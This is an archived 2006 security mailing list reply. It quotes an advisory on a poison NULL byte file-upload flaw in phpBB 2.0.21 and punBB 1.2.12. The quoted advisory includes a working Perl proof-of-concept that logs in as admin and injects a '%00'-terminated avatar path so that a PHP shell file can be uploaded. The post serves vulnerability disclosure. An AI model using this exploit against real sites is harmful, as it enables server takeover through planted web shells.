lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Tue, 12 Sep 2006 13:58:19 +0200
From: Jerome Athias <jerome.athias@...e.fr>
To: 3APA3A <3APA3A@...URITY.NNOV.RU>
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Re: ShAnKaR: multiple PHP application poison NULL
	byte vulnerability

Hi,

this was also nicely described for ASP by Brett Moore
http://www.security-assessment.com/Whitepapers/0x00_vs_ASP_File_Uploads.pdf

(French translation : 
https://www.securinfos.info/jerome/DOC/0x00_vs_ASP_File_Uploads_FR.pdf )

Best regards
/JA

3APA3A a écrit :
> Author: ShAnKaR
> Title: multiple PHP application poison NULL byte vulnerability
> Applications: phpBB 2.0.21, punBB 1.2.12
> Threat Level: Critical
> Original advisory (in Russian): http://www.security.nnov.ru/Odocument221.html
>
> Poison  NULL  byte vulnerability for perl CGI applications was described
> in  [1].  ShAnKaR  noted, that same vulnerability also affects different
> PHP  applications.  An  example of vulnerable applications are phpBB and
> punBB.
>
> Vulnerability  can  be  used  to  upload  or  replace arbitrary files on
> server, e.g. PHP scripts, by adding "poison NULL" (%00) to filename.
>
> In  case  of  phpBB and punBB vulnerability can be exploited by changing
> location  of avatar file and uploading avatar file with PHP code in EXIF
> data.
>
> A PoC exploit to change Avatar file location for phpBB:
>
>
>
> #!/usr/bin/perl -w
>
> use HTTP::Cookies;
> use LWP;
> use URI::Escape;
> unless(@ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d(DEBUG)]\n"}
> my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)');
> $ua->cookie_jar( HTTP::Cookies->new());
>
> $url='http://'.$ARGV[0].'/login.php';
> $data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1";
> my $req = new HTTP::Request 'POST',$url;
> $req->content_type('application/x-www-form-urlencoded');
> $req->content($data);
> my $res = $ua->request($req);
>
> $res=$ua->get('http://'.$ARGV[0].'/login.php');
> $content=$res->content;
> $content=~ m/true&amp;sid=([^"]+)"/g;
> if($ARGV[4]){
> $content=$res->content;
> print $content;
> }
> $url='http://'.$ARGV[0].'/login.php';
> $data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1&admin=1";
> $req = new HTTP::Request 'POST',$url;
> $req->content_type('application/x-www-form-urlencoded');
> $req->content($data);
> $res = $ua->request($req);
>
> $url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
> $data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00";
> $req = new HTTP::Request 'POST',$url;
> $req->content_type('application/x-www-form-urlencoded');
> $req->content($data);
> $res = $ua->request($req);
> if($ARGV[4]){
> $content=$res->content;
> print $content;
> }
>
>
> References:
> [1] .rain.forest.puppy, Perl CGI problems, Phrack Magazine Issue 55
>
>   

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ